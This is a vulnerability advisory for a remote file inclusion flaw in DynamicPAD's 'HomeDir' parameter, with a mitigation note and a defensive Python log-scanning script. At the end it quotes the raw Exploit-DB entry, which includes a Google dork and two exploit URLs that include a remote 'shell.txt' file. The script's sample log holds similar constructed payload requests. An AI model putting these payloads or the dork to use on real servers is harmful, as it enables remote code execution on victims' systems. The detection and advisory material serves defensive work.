Vendor: DynamicPAD
By: ThE TiGeR
CVSS: 7.5 (HIGH)
CWE: Remote file inclusion
Product Name: DynamicPAD
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

DynamicPAD Remote file inclusion (HomeDir)

DynamicPAD is vulnerable to remote file inclusion through the 'HomeDir' parameter of 'dp_logs.php' and 'index.php'. An attacker who manipulates this parameter can make the application include a malicious file and so execute arbitrary code on the target system.

Mitigation:

To mitigate this vulnerability, it is recommended to apply the latest security patches and updates for the DynamicPAD software. Additionally, input validation and sanitization should be implemented to prevent remote file inclusion attacks.
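For detection, the following added example (not part of the original advisory or of DynamicPAD) scans web server access logs for requests that supply 'HomeDir' to the two scripts named above. It assumes common/combined log format and that legitimate clients never send this parameter; the sample log lines are constructed.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Script names and parameter come from the advisory; everything else is assumed.
SCRIPTS = ("dp_logs.php", "index.php")
PARAM = "homedir"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Value that points at another host: scheme:// or protocol-relative //.
REMOTE_RE = re.compile(r"^\s*(?:[a-z][a-z0-9+.\-]*:)?//", re.I)

# Constructed sample access log (documentation addresses and host names).
SAMPLE_LOG = """\
192.0.2.10 - - [07/May/2007:10:00:01 +0000] "GET /dp/index.php HTTP/1.1" 200 5120
192.0.2.44 - - [07/May/2007:10:02:13 +0000] "GET /dp/dp_logs.php?HomeDir=http://files.example.test/a.txt? HTTP/1.1" 200 311
192.0.2.44 - - [07/May/2007:10:02:20 +0000] "GET /dp/index.php?HomeDir=%2F%2Ffiles.example.test%2Fa.txt%3F HTTP/1.1" 200 298
192.0.2.51 - - [07/May/2007:10:05:40 +0000] "GET /dp/index.php?homedir=shell.txt? HTTP/1.1" 200 402
192.0.2.10 - - [07/May/2007:10:06:02 +0000] "GET /blog/view.php?HomeDir=x HTTP/1.1" 404 0
"""


def classify(line):
    """Return None, 'homedir-supplied' or 'homedir-remote' for one log line."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    if url.path.lower().rsplit("/", 1)[-1] not in SCRIPTS:
        return None
    verdict = None
    for key, value in parse_qsl(url.query, keep_blank_values=True):
        if key.lower() != PARAM:
            continue
        # parse_qsl decoded once; decode again to catch double encoding.
        if REMOTE_RE.match(unquote(value)):
            return "homedir-remote"
        verdict = "homedir-supplied"
    return verdict


def scan(log_text):
    """Return (line_number, verdict) for every flagged line."""
    rows = ((n, classify(l)) for n, l in enumerate(log_text.splitlines(), 1))
    return [(n, v) for n, v in rows if v]


if __name__ == "__main__":
    for n, verdict in scan(SAMPLE_LOG):
        print(n, verdict)
```

A 'homedir-remote' hit with a 200 response is the case to triage first; 'homedir-supplied' hits show the parameter being set by a client at all.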

Exploit-DB raw data:

#DynamicPAD Remote file inclusion (HomeDir)

#Download script : http://dynamicpad.org/dp.tar.gz

#Thanks Str0ke

#Dork : "Powered By DynamicPAD"

#Exploit :

#http://victim.com/[dp_path]/dp_logs.php?HomeDir=shell.txt?

#http://victom.com/[dp_path]/index.php?HomeDir= shell.txt?

#Discovered by : ThE TiGeR

#Miro_Tiger[at]Hotmail[dot]com

# milw0rm.com [2007-05-07]